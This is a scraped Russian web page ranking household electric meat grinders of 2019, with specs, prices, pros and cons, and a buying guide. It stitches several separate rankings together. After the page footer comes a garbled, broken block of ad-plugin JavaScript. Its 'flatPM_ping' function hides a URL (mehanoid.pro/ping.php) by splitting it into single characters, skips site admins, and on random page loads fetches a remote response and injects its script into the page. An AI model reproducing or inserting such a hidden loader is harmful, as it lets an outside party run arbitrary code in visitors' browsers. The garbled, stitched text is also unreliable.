Открывает топ-10 лучших мясорубок 2019 года изделие отечественной фирмы – «Аксион» из Ижевска. Как и многие советские предприятия, начинала она с производства пулеметов «Максим», а в годы перестройки перепрофилировалась на бытовую технику.

Выглядит М 41.02 стильно, металлические детали надежны и полновесны, конструкция продумана, управляться с ней, собирать и разбирать, легко. В набор, помимо ножей и решеток, входят также насадки для овощей и даже пресс для цитрусовых.

Плюсы: мясорубка довольно мощная и способна с легкостью переработать большое количество мяса за один присест.

Минусы: перед применением детали рекомендуется тщательно промыть, так как их на заводе, не скупясь, промазали машинным маслом.

9. Scarlett SC-MG45S56

Средняя цена: 2 600 руб.
Характеристики:

  • мощность 1800 Вт
  • перерабатывает 2 кг/мин
  • насадка для приготовления колбас, насадка для кеббе, диск для фарша
  • корпус из пластика

Оправдывая название фирмы (scarlett = алый), мясорубка упакована в нарядный красный корпус. И большинству покупателей в первую очередь нравится эффектный внешний вид изделия.

Сама машина небольшая и с легкостью поместится даже на самой маленькой кухне. Хотя мощность у нее заявлена до 1800 Вт, реальная мощность гораздо ниже. На практике ей сложно справиться с цельным куском мяса, приходится его предварительно нарезать.

Плюсы: есть реверс, если вдруг мясо плотно намотается на шнек.

Минусы: спартанская комплектация – есть пара ножей, один-единственный перфорированный диск и насадка для кеббе (которой все равно в России мало кто пользуется).

8. Gemlux GL-MG500SS

Средняя цена: 9 000 руб.
Характеристики:

  • мощность 500 Вт
  • перерабатывает 2.7 кг/мин
  • насадка для приготовления колбас, диск для фарша
  • металлический корпус

Изделие китайских умельцев от Gemlux может похвастаться полностью металлическим корпусом и при этом практически не шумит. «Внутренности» у нее тоже цельнометаллические.

По отзывам пользователей, несмотря на низкую заявленную мощность, рубит она все, даже самое жесткое и жилистое мясо. Фарш при этом выходит превосходный.

Плюсы: металлический корпус, общее качество исполнения изделия.

Минусы: тяжелая, гемлюксовских сервисных центров в нашей стране почитай что нету, придется детали в случае поломки заказывать из самого Китая.

7. Moulinex ME 1068

Средняя цена: 3 400 руб.
Характеристики:

  • мощность 1400 Вт
  • перерабатывает 1.7 кг/мин
  • насадка для приготовления колбас, диск для фарша
  • корпус из пластика

Это одна из самых популярных мясорубок для дома, не в последнюю очередь благодаря своему эффектному внешнему виду и маленькому размеру. Она идеально подходит для небольшой кухни и небольшого количества мяса без хрящей и жил.

Плюсы: размер, стильный дизайн.

Минусы: шум, малая производительность. Нельзя мыть в посудомойке.

6. Panasonic MK-ZJ3500

Средняя цена: 24 000 руб.
Характеристики:

  • мощность 3500 Вт
  • перерабатывает 3.2 кг/мин
  • диск для фарша
  • сделана из пластика и металла
  • отсек для хранения насадок

А вот и самая дорогая модель рейтинга лучших электрических мясорубок для дома 2019 года. За Panasonic MK-ZJ3500 придется отдать в 3-4 раза больше, чем за другие позиции. Однако купившие эту мясорубку уверены, что сделали правильный выбор как минимум по 4 причинам:

  1. Во-первых, она красиво выглядит, и качественно собрана. Ничего не люфтит, ничего не отваливается, ничего не дребезжит и не едет.
  2. Во-вторых, инженеры «Панасоника» как следует над ней поработали – конструкция простая, эргономичная, легкая в уходе. В рабочее положение мясорубку можно привести буквально за полминуты.
  3. В-третьих, несмотря на мощность (заявлены аж 3500 Вт), машина отличается низким уровнем шума.
  4. В четвертых, качество прокрутки мяса отменное – фарш выходит равномерный по консистенции, красивый, причем перемалывается мясо полностью, и в шнеке не остается ничего.

Плюсы: быстрая, качественная, надежная, малошумная.

Минусы: разве что цена.

5. Unit UGR 462

Средняя цена: 2 200 руб.
Характеристики:

  • мощность 400 Вт
  • перерабатывает 1.5 кг/мин
  • насадка для шинковки
  • корпус из пластика

Это небольшая мясорубка, предназначенная для умеренных порций на 1-2 человек. Перед использованием мясо придется порезать небольшими кусками, чтобы машина с ним справилась.

Зато она очень маленькая и, что редкость для бюджетных мясорубок такого типа, у нее есть насадка для шинковки – можно настрогать овощей для гарнира к мясу.

Плюсы: размеры, насадка для овощей, цена.

Минусы: низкая мощность, поэтому даже 1 кг мяса придется продавливать минуты 2-3, не менее.

4. Zigmund & Shtain ZMG-006/007

Средняя цена: 3 600 руб.
Характеристики:

  • мощность 500 Вт
  • перерабатывает 1.9 кг/мин
  • насадка для приготовления колбас, насадка для кеббе, диск для фарша
  • корпус из пластика

Любит наш народ небольшие и недорогие мясорубки. Вот и модель от Zigmund & Shtain (несмотря на солидное название, выполненное готическим шрифтом, на самом деле это российская компания, продающая китайские товары) такая.

Она небольшая, номинальной мощности 500 Вт, стандартной комплектации (пара дисков для фарша, насадка для кеббе и колбас). С большими порциями мяса эта модель не справится, придется нарезать и подавать осторожно, чтобы машина не перетрудилась. Но для одного-двух человек, которым не нужно перерабатывать большие объемы мяса, она вполне сгодится.

Плюсы: простая, надежная, есть реверс.

Минусы: низкая мощность и шум.

3. Polaris PMG 3043L ProGear Inside

Средняя цена: 8 200 руб.
Характеристики:

  • мощность 500 Вт
  • перерабатывает 3 кг/мин
  • насадка для приготовления колбас, насадка для кеббе, диск для фарша
  • корпус из пластика
  • отсек для хранения насадок

Неплохая мясорубка за умеренную цену. Перемалывает она хорошо и быстро, может изготавливать фарш разной консистенции за счет входящих в комплектацию перфорированных дисков с отверстиями разного диаметра.

Есть также насадки для колбас и кеббе, которые реально работают – даже кеббе получается плотным и не разваливается.

Плюсы: острые лезвия мелют мясо только так, фарш выходит качественный.

Минусы: детали нельзя мыть в посудомоечной машине, поскольку средство для чистки прореагирует с алюминиевыми деталями и на них образуется некрасивый налет.

2. Kitfort KT-2102

Средняя цена: 9 000 руб.
Характеристики:

  • мощность 1800 Вт
  • перерабатывает 2.3 кг/мин
  • насадка для приготовления колбас, насадка для нарезки печенья, насадка для кеббе, диск для фарша
  • металлический корпус
  • отсек для хранения насадок

Товары от Kitfort за последние несколько лет завоевали популярность у пользователей по всей России. Не стала исключением и модель мясорубки КТ-2102.

В первую очередь пользователей привлекает в ней мощность – заявленная максимальная равна 1800 Вт, что, согласитесь, для бытовой мясорубки неплохо.

Во-вторых, у нее полностью металлический корпус, не говоря уже о внутренних деталях, включая чисто железные шестерни.

В третьих – разнообразие аксессуаров, включая такой эксклюзив, как насадку для печенья.

Плюсы: мощность и способность справиться с самым сложным мясом и рыбой с костями. Большое разнообразие насадок.

Минусы: как и у многих прочих изготовленных в Китае по китайскому образцу мясорубок, у КТ-2102 есть технологический недостаток — рычажок фиксатора, который удерживает вместе корпус и выходную трубу. Во время работы он может сойти с позиции и мясорубка прямо в процессе распадется на две части, что, согласитесь, ну очень неприятно. Поэтому следите за рычажком внимательно и в случае необходимости поправляйте его.

1. Redmond RMG-1223

Средняя цена: 3 500 руб.
Характеристики:

  • мощность 300 Вт
  • перерабатывает 1 кг/мин
  • насадка для приготовления колбас, насадка для кеббе, диск для фарша
  • корпус из пластика

На первом месте в рейтинге бытовых мясорубок по отзывам покупателей оказалось изделие фирмы Redmond – электрическая мясорубка RMG-1223. Однако, против ожидания, это не большой полупромышленный монстр, а скромная бытовая модель для нечастого использования, с небольшой заявленной мощностью, компактными размерами и низкой ценой.

И хотя она маленькая, однако небольшие порции мяса мелет просто влет. При этом, в отличие от бюджетных аналогов, по столу она не едет, благодаря прорезиненным ножкам, которые прочно удерживают машину на месте.

Способна она справиться и с «трудным» мясом благодаря функции реверса – находчивые домохозяйки перерабатывают так жесткое мясо.

Плюсы: легко разбирать, легко мыть, легко собирать обратно.

Минусы: короткий шнур, шум.

Лучшие мясорубки 2019 года

В недалеком прошлом остались времена, когда приготовление фарша сопровождалось привлечением нескольких членов семьи к процессу. Ведь далеко не каждой хозяйке было под силу перекрутить говядину или свинину в механической мясорубке, которая постоянно забивалась и трудно чистилась. К счастью, теперь есть электрически аналоги, которые предусматривают минимум усилий для реализации поставленной задачи. Мы собрали для Вас лучшие мясорубки 2019 года, как для эксплуатации в быту, так и в коммерческих целях.

Список составлен с учетом отзывов покупателей. Перед покупкой той или иной модели обязательно изучите комментарии. Чтобы не ошибиться с выбором также зайдете себе вопрос: как часто будете эксплуатировать мясорубку, что будете готовить? От этого зависит мощность, комплектация и ряд других параметров!

Рейтинг лучших мясорубок 2019 года

Хорошие мясорубки для дома

SUPRA MGS-2050

Топ электрических мясорубок открывает бюджетная модель для дома – Supra MGS-2050, мощность которой составляет 2000 Вт. Если интерпретировать производительность в человеческие ресурсы, один такой аппарат способен заменить 100 домохозяек с ручными мясорубками. Скорость обработки составляет 2.5 килограммов мяса в минуту. Предусмотрена система реверса. Если Вы захотите внести разнообразие в привычное меню, Вам в этом помогут насадка для котлет, кеббе и колбасок. К сожалению, насадок для печенья, шинковки, соковыжималки не предусмотрено. Корпус изделия изготовлен из пластика и металла. Дисков для фарша: 3 единицы. Размеры не слишком компактные.

  • лояльная стоимость;
  • высокая мощность;
  • скорость работы;
  • простота в эксплуатации;
  • три диска для фарша.
  • комплектация скудная;
  • размеры большие.

BORK M781

Еще одной мощной мясорубкой для дома является модель Bork M781, привлекающая стильным дизайном и хорошей комплектацией. С ее помощью можно шинковать мясо, делать фарш, натирать овощи при помощи специальных насадок. Мощности 2000 Вт вполне хватает для разнообразных экспериментов на кухне. Хороший результат достигается за счет эксплуатации профессиональной системы ножей. Предусмотрено автоматическое отключение реверса, что обеспечивает продолжительный срок эксплуатации. Еще одним приятным бонусом является механизм Smart Lock, позволяющий максимально быстро собирать/разбирать мясорубку. Кроме того, указанная технология предотвращает вибрации при работе. Для удобства эксплуатации предусмотрено два режима скоростей. В комплект входит четыре насадки: терка, для шинковки, овощерезка, для приготовления колбас. Вес устройства составляет 5.6 килограммов. Длина шнура 110 сантиметров.

  • простота в использовании;
  • высокая мощность;
  • отсутствие вибраций;
  • комплектация;
  • демократичная цена.
  • короткий кабель;
  • завышенная цена.

REDMOND RMG-1250

Эта модель позиционируется, как устройство премиальной линейки Chrome and Bronze, но скорее относится к числу хороших недорогих мясорубок. Данный аппарат привлекает хорошим функционалом и надежностью. Вдобавок, имеет яркий дизайн. Предусматривает мелкий и крупный помол фарша за счет двух скоростей работы. Производительность составляет 2.5 килограммов в минуту. В комплект входит насадка для кеббе и колбас. Номинальная мощность при работе со свининой составляет 470 Вт, с говядиной 480 Вт. Исходя из инструкции, время беспрерывной работы составляет 5 минут. Учитывая производительность, в домашних условиях вполне хватает 1-2 минут работы. Что касается удобства эксплуатации, здесь также придраться не к чему – легко моется, разбирается. Единственный недостаток – высокий уровень шума.

  • высокая производительность;
  • два режима работы;
  • оптимальная номинальная мощность;
  • энергопотребление;
  • стильный внешний вид;
  • простота в эксплуатации.
  • уровень шума.

Dauken FW3040

Если планируете купить хорошую мясорубку для дома, Вам стоит обратить внимание на новое решение европейского бренда Dauken – FW3040. Новинка работает на базе двух скоростей при номинальной мощности 800 Вт. Судя по комментариям покупателей, производитель позаботился о качестве мельчайших деталей. Это положительно отразилось на удобстве сборки аппарата и его мойке. За одну минуту можно обрабатывать от 2 до 3 килограммов мяса, в зависимости от его жесткости. Таким образом, модель имеет производительность, приближенную к решениям для коммерческих целей. Еще одним достоинством кухонного помощника является небольшой вес. При 3.8 килограммах аппарат выдает минимум вибраций и шумов. Внутри корпуса находится комплект систем безопасности и защиты, обеспечивающий плавный пуск электрического мотора, предотвращающих его преждевременный износ.

  • надежность и безопасность;
  • производительность и мощность;
  • простота эксплуатации;
  • несколько режимов работы;
  • хороший бренд;
  • стильный дизайн.
  • количество насадок.

Tefal NE105838

Лучшая мясорубка для дома на 2019 год – Tefal NE105838, привлекающая отличным соотношением цена/качество. Речь идет о надежном приборе, производительность которого составляет 1.7 килограммов мяса в минуту. Предусмотрена функция реверса. Есть две решетки. Максимальная мощность 1800 Вт. В комплекте имеется толкатель, насадка для колбасок и кеббе. Все детали качественные, дефектов не обнаружено. Корпус изготовлен из высококачественного пластика. Исходя из мнения покупателей, устройство полностью соответствует стоимости. Эта модель вполне подходит для эксплуатации в семье от 3 до 4 человек.

Рейтинг мясорубок 2019-2020

Использование электромясорубки на домашней кухне обусловлено скоростью работы и мощностью приборов. Многие хозяйки предпочитают электромясорубку даже кухонному комбайну. Благодаря дополнительным насадкам, электромясорубка выполняет намного больше функций, чем от неё можно ожидать.

Виды мясорубок:

Ударная мясорубка не прокручивает мясо, а сечёт его ножами. Чаще всего такие мясорубки встроены в кухонных комбайнах.

Шнековые мясорубки прокручивают мясо. Это надёжный и хорошо себя зарекомендовавший вид мясорубки.

Ножи мясорубки должны быть металлическими и хорошо заточенными. Их рекомендуется затачивать пару раз в год. Обоюдоострые ножи можно менять сторонами, и, соответственно, они затачиваются реже. Шнек и решётки также должны быть металлическими.

Выбираем электрическую мясорубку

Мощность

Мощность – важнейшая из характеристик электромясорубки. Часто производители указывают время работы прибора без перерыва.

  • 1200-1400 Вт. Мясорубки с данной мощностью – первоклассные устройства. Такие мясорубки перемалывают не менее 2 кг мяса в минуту.
  • 800-1200 Вт. Производительность таких приборов – 1,5 кг в минуту, но они хорошо справляются с твёрдым и жилистым мясом.
  • 400-800 Вт. Маломощные мясорубки обрабатывают менее 1 кг в минуту, зато стоят намного дешевле мощных.

Полезный функционал

При выборе мясорубки стоит обратить внимание, есть ли у машины функция блокировки. Безопасность – прежде всего. Некоторые модели мясорубок также оснащены защитой от перегрева или перегрузки. Такое случается, если среди мяса попадается крепкий хрящ. Функция ограничения времени непрерывной работыможет включаться устройством при обработке очень твёрдых продуктов, например, в течение 10 секунд.

Также очень полезной функцией прибора является реверс. Когда вы удерживаете кнопку «реверс», шнек вращается в обратном направлении. Эта функция позволяет вернуть застрявшие кусочки для повторной переработки. Так что уж если покупать мясорубку, то обязательно с реверсом.

Материал электромясорубки сегодня предлагается трёх типов:

  • металл,
  • пластик,
  • комбинированный (пластик+металл). В этом виде мясорубок раструб и передняя панель изготовлены из металла, а корпус – пластиковый.

Складной корпус – очень хорош. В этом плане очень выигрывают комбинированные модели.

Материал шнека очень важен. Этот механизм подаёт мясо на ножи. Как говорилось выше, шнек должен быть выполнен из металла. Некоторые производители в комплект мясорубки добавляют дополнительные пластиковые шнеки. Такая мясорубка предназначена также для переработки фруктов и овощей.

Длина шнура. Мясорубка – прибор мощный, поэтому он должен хорошо крепиться на устойчивой поверхности. Такая поверхность в кухне не всегда близка к розетке. Длинный шнур прибора в некоторых моделях удобно складывается.

Прорезиненные ножки мясорубки – то, что помогает крепить устройство надёжно, избегая вибрации.

Функциональность электромясорубок зависит от количества насадок и дополнительных инструментов. Самые популярные из них:

  • соковыжималка,
  • ломтерезка,
  • «кеббе»,
  • насадки для печенья,
  • насадки для драников,
  • шинковка,
  • насадка для домашней колбасы,
  • решётки различного диаметра,
  • толкатели.

Чем полезны насадки для электромясорубки?

«Кеббе» − насадка для фарширования сосисок с помощью мясорубки.

Насадка для домашней колбасы очень проста и удобна в использовании: оболочка колбасы надевается на горлышко насадки – и прибор быстро начиняет колбасу.

Тёрка, тёрка для драников – это цилиндры и диски с отверстиями определённой формы. С их помощью можно перерабатывать картофель и другие овощи.

Насадки для нарезки, шинковки – барабаны или конусы, выполняющие нарезку овощей для супов, рагу, других вкусных блюд. Некоторые подобные насадки используются вместо шнека.

Насадки для печенья – это пластиковые диски с красивыми фигурками. Печенья мясорубка может сделать сколько угодно, ведь тесто перерабатывается очень быстро! Существуют дополнительные насадки и для профилирования теста.

Насадки для фарша – это диски с разным диаметром отверстий. Пропуская массу через отверстия, получаем фарш различной консистенции.

Соковыжималка – очень полезная насадка. Она работает по принципу пресса, выжимая сок из любых фруктов.

В некоторых моделях электромясорубок предусмотрен особый отсек для хранения насадок.

Лучшие мясорубки 2019-2020

5-е место − Аксион М 32.01 (2300 руб.)

Эта модель популярна, благодаря невысокой стоимости и наличию базовых функций. Прибор достаточно мощный и компактный. В наборе есть дополнительные шестерёнки и отсек для хранения.

  • Мощность − 230-1500 Вт,
  • Производительность — 1.6 кг/мин,
  • Корпус – пластик,
  • Перфорированный диск для фарша – 2 шт.,
  • Лоток – пластик,
  • Мытье в посудомоечной машине,
  • Прорезиненные ножки.

  • низкая цена,
  • мощность,
  • острый нож,
  • отсек для провода и решёток,
  • длинный шнур,
  • дополнительные шестерёнки
  • решётка может заржаветь после мытья,
  • шум,
  • греется,
  • неудобно закрывается крышка отсека хранения.

4-е место − Marta MT-2084 (2250 руб.)

Marta MT-2084 − базовая электромясорубка, очень проста в эксплуатации. Главное в этом приборе – наличие функции реверса. Острые ножи быстро обрабатывают даже твёрдое мясо. Довольно надёжная среди бюджетных моделей.

  • Мощность − до 2 кВт,
  • Производительность − 2 кг/мин,
  • Корпус – пластик,
  • Перфорированный диск для фарша – 2 шт.,
  • Лоток – пластик,
  • Мытье в посудомоечной машине,
  • Прорезиненные ножки,
  • Реверс,
  • Защита от перегрузки,
  • Максимальное время непрерывной работы – 5 мин,
  • Вес − 2.55 кг.
  • мощность,
  • цена,
  • удобная в обращении,
  • не шумная,
  • функция «Реверс»,
  • хорошо крепится к столу;
  • многофункциональна.
  • перегрев, если «крутить на полную»,
  • коротковат шнур,
  • запчасти проще найти через сайт производителя, чем в сервисе.

3-е место − Polaris PMG 1820L (4999 руб.)

«Золотой серединой» в рейтинге мясорубок-2019 стала мощная и функциональная модель — Polaris PMG 1820L. Оснащённая реверсом, мясорубка справляется и со сложными задачами. Кулинаров порадует насадка для приготовления домашних колбас. Тёрка и шинковки также пригодятся в хозяйстве. Модель компактна и оснащена ручкой для переноса, удобна в обращении. Переключатели скоростей оснащены светодиодной подсветкой.

  • Мощность – 180-1800 Вт,
  • Производительность — 1.8 кг/мин,
  • Корпус – пластик,
  • Лоток – металл,
  • Прорезиненные ножки,
  • Перфорированный диск для фарша – 2 шт.,
  • Тёрка,
  • Насадка для шинковки,
  • Насадка для приготовления колбас,
  • «Кеббе»,
  • Защита двигателя от перегрузки,
  • «Реверс»,
  • Максимальное время непрерывной работы − 3 мин.
  • доступная стоимость,
  • тихая,
  • мощная,
  • реверс,
  • комплектация,
  • легко моется,
  • компактная,
  • ограничение непрерывной работы (3 мин),
  • качество материала ножей и решетки,
  • не самая производительная по скорости.

2-е место − Moulinex ME 687832 (12 999 руб.)

Высокая производительность, быстрота, безопасность, компактность и оптимальная стоимость – характеристики данной модели, в которой производитель соединил лучшие качества мясорубок торговой марки Moulinex. Мясорубка справляется как с подмороженным, так и с мягким мясом. Набор шинковок является дополнительным подспорьем в приготовлении салатов и овощей к мясным блюдам.

Для хорошей работы устройства производитель оснастил мясорубку Moulinex ME 687832 функцией обратного хода. Это помогает избежать стопорения ножа при длительной работе с большим объёмом продуктов.

  • Мощность – от 800 до 2200 Вт;
  • Производительность – 4,5 кг/мин;
  • Корпус – металл + пластик;
  • Лоток – пластик;
  • Прорезиненные ножки;
  • Перфорированный диск для фарша – 2 шт.;
  • Насадка для приготовления колбас;
  • Насадка для шинковки;
  • Насадка-терка;
  • «Кеббе»;
  • Толкатель в комплекте;
  • Отсек для насадок;
  • Самозатачивающийся нож;
  • Мытье в посудомоечной машине.
  • соотношение цена / качество;
  • высокая производительность;
  • хорошая мощность;
  • скорость работы;
  • автоотключение при перегреве мотора;
  • функционал;
  • есть реверс;
  • качество материалов и сборки;
  • металлические соединения;
  • контейнер для ножа и решётки;
  • нож затачивается самостоятельно;
  • устойчивая;
  • внешний вид.
  • сильно шумит;
  • слабое место ‒ шнек (периодически ломается, рекомендуется чаще использовать реверс);
  • лоток выполнен из пластика.

1-е место − Bosch MFW 66020 (5500 руб.)

На первое место в рейтинге лучших электромясорубок 2019 года, согласно отзывам покупателей, выходит модель Bosch MFW 66020. У машины есть технические особенности, которые говорят о хорошем качестве сборки: вращение от двигателя на шнек передается посредством металлического крепления. То есть, шестерёнка на шнеке, а также гнездо выполнены из металла. Это обеспечивает надёжность. Мощность прибора вполне отвечает запросам большой семьи, мясорубка устойчива и довольно компактна.

Пользователей порадуют большой загрузочный лоток с толкателем и наличие трёх перфорированных дисков.

  • Мощность – 600-1800 Вт,
  • Производительность – 3 кг/мин,
  • Корпус – пластик,
  • Лоток – металл,
  • Прорезиненные ножки,
  • Перфорированный диск для фарша – 3 шт.,
  • Насадка-тёрка,
  • Насадка для шинковки,
  • Насадка для приготовления колбас,
  • «Кеббе»,
  • Отсек для насадок,
  • Система реверса.
  • оптимальное соотношение цены и качества,
  • мощность,
  • устойчивость,
  • хорошие насадки,
  • ножки-присоски,
  • компактность,
  • дизайн,
  • легко разбирается,
  • удобно мыть,
  • тихая.
  • нож быстро затупляется,
  • плохо крепится лоток,
  • короткий шнур (97 см),
  • близкое расположение кнопок пуск/стоп и реверс,
  • плохо режет жилистое мясо,
  • часть деталей (шнек, приёмник) нельзя мыть в посудомоечной машине.

Подведём итоги.

Электромясорубки уверенно потеснили своих механических предшественниц. Покупатели отдают предпочтение, прежде всего, надёжным высокопроизводительным моделям. Потребителям нравятся мясорубки с реверсивным движением шнека и возможностью приготовления фарша различной консистенции при помощи решёток с разнящимся диаметром отверстий. Электромясорубки составляют конкуренцию кухонным комбайнам, потому что хозяйки часто выбирают модели электромясорубок с расширенным функционалом.

Вместе с тем — и полезный совет: чем больше возможных сценариев предусматривает прибор, тем обычно хуже он справляется с единичным процессом — по сравнению с узкоспециализорованными версиями. Так, отдельно соковыжималки со своей задачей справятся лучше, чем мясорубка с соответствующей насадкой, а обычный миксер взобьет гоголь-моголь лучше, чем навороченный погружной блендер. Правда, есть и приятное исключение: объединение в одном компактном корпусе блендера и пароварки (получился прибор со скромным названием блендер-пароварка) радует своей работой мам — и их малышей. Но в последнем случае мы можем увидеть исключение, которое подтверждает «правило»: прибор также получился достаточно узкоспециализированным и не подойдет для готовки на всю семью.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика